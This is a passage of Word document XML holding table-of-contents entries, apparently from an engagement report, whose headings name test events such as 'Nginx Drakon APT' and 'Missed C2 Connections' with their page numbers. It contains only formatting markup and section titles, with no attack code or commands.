        <w:p w14:paraId="6575F93F" w14:textId="70081C8D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600113" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.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113 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79E7C531" w14:textId="08B8AD8E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600114" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600114 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B84EACD" w14:textId="6925770E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600115" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10:16 -- CADETS 1 and 2 -- Nginx Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600115 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45309A02" w14:textId="3E34AB8A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600116" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4.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116 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="749108E7" w14:textId="2CC5D3DD" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600117" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4.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117 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B0F7F60" w14:textId="12D9AD6D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600118" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600118 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C9670A6" w14:textId="307EBE8A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600119" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log 2 (Missed C2 Connections)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600119 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="526C6400" w14:textId="5F094C91" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600120" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11:50 -- TA1 ClearScope 2 -- Firefox Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600120 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="234529B8" w14:textId="24CA1A0C" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600121" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.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121 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F5E49E4" w14:textId="516F5C74" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600122" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.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122 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F4585B2" w14:textId="215EFA74" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600123" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600123 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3926DDA6" w14:textId="4911907B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600124" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12:26 -- FiveDirections 3 -- Firefox DNS Drakon APT FileFilter-Elevate</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600124 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2311F6EF" w14:textId="6E272BC6" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600125" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6.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125 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="033AE933" w14:textId="37B496A9" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600126" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6.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126 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0610E9C0" w14:textId="0934FDE0" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
